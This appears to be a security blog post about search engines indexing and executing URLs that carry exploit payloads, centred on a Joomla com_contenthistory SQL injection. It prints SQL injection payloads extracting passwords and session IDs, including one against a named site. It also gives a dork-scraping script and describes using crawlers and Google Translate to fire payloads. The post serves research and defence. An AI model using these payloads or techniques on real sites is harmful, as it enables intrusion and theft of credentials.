__Google is a well-known search engine, and in the security community also famous for the “Google dorks” functionality: finding vulnerable websites using Google queries. __
Exploits in the Google Url Database
Using google dorks is not new and has been discussed thoroughly, however while we were analyzing the Joomla SQL injection vulnerability on com_contenthistory, we found this URI in the results of the Google query:
If we decode the URL parameters, we get this:
com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from
Please note that this specific URI is not complete, but the full request is potentially executed by Google web crawlers.
What is the issue?
This effect is interesting for three reasons:
..1. Abusing Google (or other search engines) to execute payloads ..2. Finding potentially zero days in the Google index. ..3. Getting results of exploits, such as passwords and private user data, which are cached in Google, even after the issue has been fixed
Abusing Google to execute payloads
The first technique is elaborated on in Phrack 57, 0x0a: Against the System: Rise of the Robots by Michal Zalewski. Michal uses an HTML document with links that contain payloads to potentially vulnerable webservers. When crawlers pick up on these links, they execute the payload on behalf of Michal. To quote the very founders of Google on this issue:
“[…] big difference between the web and traditional well controlled collections is that there is virtually no control over what people can put on the web. Couple this flexibility to publish anything with the enormous influence of search engines to route traffic and companies which deliberately manipulating search engines for profit become a serious problem.” — Sergey Brin, Lawrence Page “The Anatomy of a Large-Scale Hypertextual Web Search Engine” Googlebot concept, Sergey Brin, Lawrence Page, Stanford University
To expand a bit on the first issue, you could use of the Google Translate function as proxy. This allows you to skip the process of waiting for the crawlers to pick up your malicious links and execute them straight away:
Finding exploits in the Google Index
The following script can be used to scrape Google, note that this script needs some fine-tuning:
pi@raspberrypi ~/bitsensor $ wget http://www.catonmat.net/downlo... --2016-01-04 19:54:14-- http://www.catonmat.net/downlo... Resolving www.catonmat.net (www.catonmat.net)... 220.127.116.11 Connecting to www.catonmat.net (www.catonmat.net)|18.104.22.168|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/zip] Saving to: `xgoogle.zip` [ <=> ] 70,319 1121K/s in 0.1s 2016-01-04 19:54:20 (1121 KB/s) - `xgoogle.zip` saved  pi@raspberrypi ~/bitsensor $ unzip xgoogle.zip Archive: xgoogle.zip www.catonmat.net creating: examples/ inflating: examples/example2.py inflating: examples/example3.py inflating: examples/example1.py creating: programs/ inflating: programs/google_fight2.py inflating: programs/google_fight.py inflating: programs/english.py creating: xgoogle/ inflating: xgoogle/browser.py inflating: xgoogle/sponsoredlinks.py inflating: xgoogle/__init__.pyc inflating: xgoogle/search.py inflating: xgoogle/BeautifulSoup.pyc inflating: xgoogle/googlesets.py inflating: xgoogle/BeautifulSoup.py inflating: xgoogle/browser.pyc inflating: xgoogle/search.pyc inflating: xgoogle/translate.py inflating: xgoogle/__init__.py inflating: contributors.txt inflating: projects-using-xgoogle.txt inflating: readme.txt pi@raspberrypi ~/bitsensor $ ls contributors.txt examples programs projects-using-xgoogle.txt readme.txt xgoogle pi@raspberrypi ~/bitsensor $ cat GoogleSearch.py from xgoogle.search import GoogleSearch, SearchError from threading import Thread from random import randint import time try: gs = GoogleSearch("inurl:'index.php?option=com_contenthistory'") gs.results_per_page = 50 displayedResults = 0 results = gs.get_results() while displayedResults < gs.num_results: for res in results: if res.url is not None: print res.url.encode('utf8') displayedResults += gs.results_per_page print time.sleep(randint(15,60)) results = gs.get_results() except SearchError, e: print "Search failed: %s" % e pi@raspberrypi ~/bitsensor $ python GoogleSearch.pyhttp://hafelekar.com/en/index.php?option=com_contenthistory&view=history&list%5Bselect%5D=1+AND+extractvalue(rand()%2Cconcat(0x23%2C(SELECT+concat(session_id%2C0x23)+FROM+ugq2y_session+WHERE+userid%3D44+LIMIT+0%2C1)))--+-
All users of the Joomla website should be informed about the breach. Google should be contacted to get them to remove the cached page. This disables attackers’ use of Google Cache to retrieve information like username and passwords.
Using Google Alert
Google Alert is a service which sends an email when a certain query is found. For example, if we add the above mentioned Google query here, we receive an email with which site is added, every time a new page is indexed. Using this methodology we are able to get a good view on which kind of payloads are used by cyber criminals.
In the screenshot an example email of Google Alerts. Please note in this case another dork is used: